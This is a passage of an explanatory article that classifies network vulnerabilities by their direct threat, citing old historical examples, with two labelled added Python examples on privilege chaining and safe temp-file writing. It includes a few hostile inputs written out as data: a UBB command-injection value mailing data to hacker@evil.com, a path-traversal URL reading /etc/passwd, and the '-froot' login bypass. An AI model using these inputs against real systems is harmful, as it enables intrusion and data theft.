This article summarizes some thoughts on the main problem encountered when constructing a vulnerability database, namely how to classify computer network vulnerabilities. Some of the ideas here are not mature, and I am not fully satisfied with some of them myself; I put them forward to exchange views with colleagues who have studied this area in depth and to improve the work together. A computer network security vulnerability has many attributes. I think they can be summarized under the following aspects: the direct threat the vulnerability may pose, the cause of the vulnerability, the severity of the vulnerability, and how the vulnerability is exploited. The following sections describe the categories of vulnerabilities.
A. Direct threats to the system caused by vulnerabilities
These can be roughly divided into the following categories. Note that the security threat posed by a vulnerability is far from limited to its direct effect: if an attacker gains ordinary-user access to a system, it is very likely that he can escalate to administrator privilege by exploiting a local vulnerability.
1. Remote administrator privilege
Attackers do not need an account to log on to the local computer; they obtain administrator privilege on the remote system directly. Generally this is done by attacking a defective system daemon that runs as root. Most such vulnerabilities are buffer overflows; a few are logic defects in the daemon.
Typical vulnerabilities:
1. The AUTHENTICATE command of the IMAP4rev1 v10.190 daemon imapd does not check the length when reading its parameter. A carefully constructed AUTH command string can overflow imapd's buffer and run a specified command; since imapd runs as root, this directly yields root privilege on the machine.
2. The ISAPI DLL of Windows NT IIS 4.0 does not perform proper boundary checks on the input URL. An overlong URL can overflow the buffer of IIS (inetinfo.exe) and execute specified code. Since inetinfo.exe is started as Local System, Administrator privilege is obtained directly after the overflow.
3. In the early days, the rlogind code of AIX 3.2 had an authentication logic defect: by requesting `-froot`, an attacker could log on to the system directly as root without providing a password.
2. Local administrator privilege
When an attacker has a local account that can log on to the system, he can obtain system administrator privilege by attacking defective local suid programs or race conditions.
Typical vulnerabilities:
1. RedHat Linux's restore is a suid program whose execution relies on the environment variable RSH. By setting environment variables such as PATH, the executable program named in the RSH variable can be made to run as root, yielding root privilege on the system.
2. The Xsun program of Solaris 7 is suid and does not perform valid boundary checks on its input parameters. Its buffer can easily be overflowed to run attacker-specified code as root, obtaining administrator privilege.
3. In Windows, attackers have the opportunity to make the Network DDE agent (Network DDE is a technology for dynamically sharing data between applications on different Windows machines) execute specified code in the security context of the Local System account, thereby escalating privilege and fully controlling the local machine.
3. Ordinary user access permission
This is ordinary access permission: the ability to execute programs and access files as a normal user. Attackers usually obtain it by attacking a daemon running as a non-root user or by means of a defective CGI program.
Typical vulnerabilities:
1. UBB is a forum program widely used on a variety of UNIX and Windows systems, implemented in Perl. Versions earlier than 5.19 have an input validation problem: by submitting carefully crafted form content, an attacker can make UBB execute shell commands. Since a web server generally runs as nobody, a shell as nobody can be obtained. For example, submitting data such as: topic=012345.ubb mail hacker@evil.com
2. The innd 2.2.2.3 news server in RedHat Linux 6.2 has a buffer overflow vulnerability. Using a specially crafted news article, an attacker can make the innd server run specified code as the news user and obtain a shell with innd's privileges.
3. Windows IIS 4.0-5.0 has a Unicode decoding vulnerability. Attackers can use cmd.exe to run programs on the system with the permissions of the guest group, which is equivalent to obtaining ordinary user permissions.
4. Privilege escalation
Attackers attack defective sgid programs locally to escalate their privileges to those of another non-root user. Obtaining administrator privilege can be seen as a special case of privilege escalation, but it is treated as an independent threat category here.
Typical vulnerabilities:
1. The man program of RedHat Linux 6.1 is sgid man and has a format string bug. By exploiting it, attackers can obtain the permissions of the man group.
2. The write program of Solaris 7 is sgid tty and has a buffer overflow problem. By attacking it, attackers can obtain the permissions of the tty group.
3. In Windows NT, attackers can plant a special profile for other users on the system, so that those users, sometimes even administrators, execute malicious code.
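Categories 1 to 4 above all describe the privilege an attacker ends up with, and the introduction points out that they chain: an ordinary-user foothold plus a local administrator-privilege vulnerability amounts to remote administrator access. The following is an added example, not code from the article, of how a vulnerability database could record the four attributes the article names and compute the privilege reachable on a host by chaining. The `Vuln` record, the `Priv` lattice and all sample records are assumptions constructed for illustration, modeled loosely on the article's examples.

```python
"""Added example (not part of the original article): a minimal vulnerability
record carrying the article's four attributes, a mapping onto categories 1-4,
and the chaining rule from the introduction. All records are constructed."""
from dataclasses import dataclass
from enum import IntEnum


class Priv(IntEnum):
    """Privilege an attacker holds on the target, in increasing order."""
    NONE = 0   # no foothold on the host at all
    USER = 1   # ordinary user (article's category 3)
    ROOT = 2   # administrator / root (categories 1 and 2)


@dataclass(frozen=True)
class Vuln:
    vid: str          # database identifier (constructed)
    cause: str        # e.g. "buffer overflow", "logic defect", "race condition"
    severity: str     # e.g. "high", "medium", "low"
    requires: Priv    # privilege the attacker must already hold to exploit it
    grants: Priv      # privilege the direct threat yields

    @property
    def remote(self) -> bool:
        """Exploitable without first logging on: no foothold required."""
        return self.requires == Priv.NONE


def direct_threat_category(v: Vuln) -> int:
    """Map a record onto the article's categories 1-4 (privilege outcomes)."""
    if v.grants == Priv.ROOT:
        return 1 if v.remote else 2   # remote / local administrator privilege
    if v.grants == Priv.USER:
        return 3 if v.remote else 4   # ordinary user access / privilege escalation
    raise ValueError(f"{v.vid}: not a privilege-granting threat")


def reachable_privilege(vulns, start: Priv = Priv.NONE) -> Priv:
    """Highest privilege reachable by chaining `vulns` from `start`.

    Iterates to a fixpoint: any vulnerability whose precondition is met by the
    current level, and which grants more than that level, raises the level.
    """
    level = start
    changed = True
    while changed:
        changed = False
        for v in vulns:
            if v.requires <= level and v.grants > level:
                level = v.grants
                changed = True
    return level


# Constructed sample records, loosely modeled on the article's examples.
CGI_SHELL = Vuln("C-001", "input validation", "medium", Priv.NONE, Priv.USER)   # cat. 3
SUID_OVERFLOW = Vuln("C-002", "buffer overflow", "high", Priv.USER, Priv.ROOT)  # cat. 2
SGID_FORMAT = Vuln("C-003", "format string", "low", Priv.USER, Priv.USER)       # cat. 4
DAEMON_OVERFLOW = Vuln("C-004", "buffer overflow", "high", Priv.NONE, Priv.ROOT) # cat. 1

# Two hosts: A exposes a CGI foothold and a local suid overflow, B only the latter.
HOST_A = [CGI_SHELL, SUID_OVERFLOW]
HOST_B = [SUID_OVERFLOW]


def host_report(name: str, vulns) -> str:
    """One-line summary: categories present and the privilege reachable remotely."""
    cats = sorted({direct_threat_category(v) for v in vulns})
    return f"{name}: categories {cats}, remote attacker reaches {reachable_privilege(vulns).name}"


if __name__ == "__main__":
    print(host_report("host A", HOST_A))   # categories [2, 3], reaches ROOT
    print(host_report("host B", HOST_B))   # categories [2], reaches NONE
```

The point of the fixpoint loop is that a database listing host A's two vulnerabilities as "medium" and "local high" understates the risk: taken together they are a remote root compromise, which is exactly the combination the introduction warns about.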
5. Reading restricted files
Attackers exploit certain vulnerabilities to read files in the system that they are not permitted to read; these files are usually security-related. Such vulnerabilities may be caused by incorrectly set file permissions, incorrect file handling by privileged processes, or an unexpected core dump that writes part of a restricted file into the core file.
Typical vulnerabilities:
1. The ftpd of SunOS 5.5 has a vulnerability: an ordinary user can cause ftpd to fail and dump a world-readable core file containing a segment of the shadow file, so that the ordinary user can read part of the shadow file's contents.
2. The suid program pb of SuSE 6.2 has problems in handling its configuration file. By linking pb.conf to a privileged file, you can use pb to read the contents of that file.
3. The log file of Oracle 8.0.3 Enterprise Edition for NT 4.0 is world-readable and in cleartext. It records the connection password and may be read by attackers.
6. Remote denial of service
Attackers can exploit such vulnerabilities to launch DoS attacks against the system without logging on, causing the system or related applications to crash or stop responding. These vulnerabilities are usually caused by defects or incorrect settings in the system or its daemons.
1. The IP fragment reassembly module of early Linux and BSD TCP/IP stacks had a defect. An attacker could crash the machine by sending specially crafted IP fragments to the system.
2. NetMeeting 3.01 on Windows 2000 has a defect: sending a binary data stream to it can make the server occupy 100% of the CPU.
3. Sending a USER command with an overlong parameter to the ftp port of AnalogX Proxy Server 4.04 can crash the application.
7. Local denial of service
Attackers who have logged on to the system can exploit such vulnerabilities to crash the system or an application. They are mainly caused by programs mishandling unexpected situations, such as not checking whether a file already exists before writing a temporary file, or blindly following a symbolic link.
1. BSDi 3.x has a vulnerability that allows a local user to overwrite arbitrary files on the system with junk data, easily making the system unusable.
2. The tmpwatch program of RedHat 6.1 has a defect that can make the system fork() a large number of processes, leaving the system unresponsive.
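The temp-file mistake named above (writing to a predictable path without checking what is already there, and following whatever link sits at that path) is easy to show concretely. The following is an added example, not code from the article: a naive writer and a hardened writer run against a directory in which a symbolic link has been planted at the expected temp-file path. The directory layout, file names and contents are constructed for the demonstration.

```python
"""Added example (not from the article): the temp-file mistake described in
category 7, shown beside a safe version. A symlink planted at the expected
temp-file path by another local user redirects a naive open() onto a file
the program should never touch. Everything here runs in a private temp tree."""
import os
import tempfile


def naive_write(path: str, data: bytes) -> None:
    """Unsafe: open(..., 'wb') follows an existing symlink and truncates
    and overwrites whatever the link points at."""
    with open(path, "wb") as f:
        f.write(data)


def safe_write(path: str, data: bytes) -> None:
    """Safe: only proceed if we create the file ourselves.

    O_CREAT|O_EXCL makes the open fail with EEXIST if anything (including a
    symlink, even a dangling one) already sits at `path`; O_NOFOLLOW adds a
    second guard where the platform provides it, and 0o600 keeps the file
    private. Python raises FileExistsError for EEXIST."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(data)


def demo(writer) -> tuple:
    """Plant a symlink at the temp-file path pointing at a 'protected' file,
    then run `writer` on that path.

    Returns (content of the protected file afterwards, name of the exception
    raised by the writer or None)."""
    with tempfile.TemporaryDirectory() as d:
        protected = os.path.join(d, "protected.conf")   # constructed victim file
        with open(protected, "wb") as f:
            f.write(b"important\n")
        tmp = os.path.join(d, "app.tmp")                # predictable temp name
        os.symlink(protected, tmp)                      # the pre-planted link
        err = None
        try:
            writer(tmp, b"junk\n")
        except OSError as e:
            err = type(e).__name__
        with open(protected, "rb") as f:
            after = f.read()
        return after, err


if __name__ == "__main__":
    print("naive:", demo(naive_write))   # protected file clobbered, no error
    print("safe: ", demo(safe_write))    # protected file intact, FileExistsError
```

In practice the usual idiom is `tempfile.mkstemp()` (or `NamedTemporaryFile`), which applies the same O_CREAT|O_EXCL rule with an unpredictable name, so the attacker cannot guess the path in the first place; the explicit `os.open` above just makes the protective flags visible.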
8. Remote unauthorized file access
By exploiting these vulnerabilities, attackers can remotely access certain system files without authorization. They are mainly caused by defective CGI programs that do not properly check the validity of user input, so that attackers can reach files by constructing special input.
Typical vulnerabilities:
1. The Poll_It_SSI_v2.0.cgi vulnerability allows attackers to view any file outside the web directory that the server has permission to access. For example, sending the following request to the server displays the /etc/passwd file: http://www.targethost.com/pollit/Poll_It_v2.0.cgi?Data_dir=etcpasswd%00
2. Windows IIS 5.0 has a vulnerability: by sending it a special header flag, you can obtain the ASP source code instead of the page produced by executing the ASP script.
3. Windows IE has many vulnerabilities that allow malicious web pages to read users' local files.
9. Password recovery
Because a weak password encryption method is used, attackers can easily analyze and derive the encryption algorithm; once they obtain the encrypted password by some means, they can recover the plaintext.
Typical vulnerabilities:
1. PassWD v1.2 for Windows manages the various passwords in the system and stores them together with their URLs, but its password encryption method is very weak. After simple analysis, the plaintext can be recovered from the encrypted password.
2. pcAnywhere 9.0 uses a very weak encryption method for passwords in transmission. Anyone who obtains the transmitted data can easily decode the plaintext password.
3. Browsegate is a proxy firewall for Windows. Version 2.80.2 stores the encrypted password in a configuration file that is readable by all users, and the encryption method is extremely weak, so the plaintext can easily be recovered.
10. Spoofing
Attackers can exploit such vulnerabilities to deceive the target system or its users, usually because of defects in the system's implementation.
Typical vulnerabilities:
1. Windows IE has a vulnerability that allows a malicious web site to insert content into a window belonging to another site, thereby tricking users into entering sensitive data.
2. The TCP/IP stack of Linux kernel 2.0.35 has a vulnerability that makes IP address spoofing easy for attackers.
11. Server information leakage
Attackers can exploit such vulnerabilities to collect information useful for further attacks. This type of vulnerability mainly arises because a system program has a defect and handles error conditions incorrectly.
Typical vulnerabilities:
1. Windows IIS 3.0-5.0 has a vulnerability: when a request is made for a non-existent .idq or .ida file, the machine may return an error message that exposes the IIS installation directory. For example, requesting http://www.microsoft.com/anything.ida makes the server return a response such as: The IDQ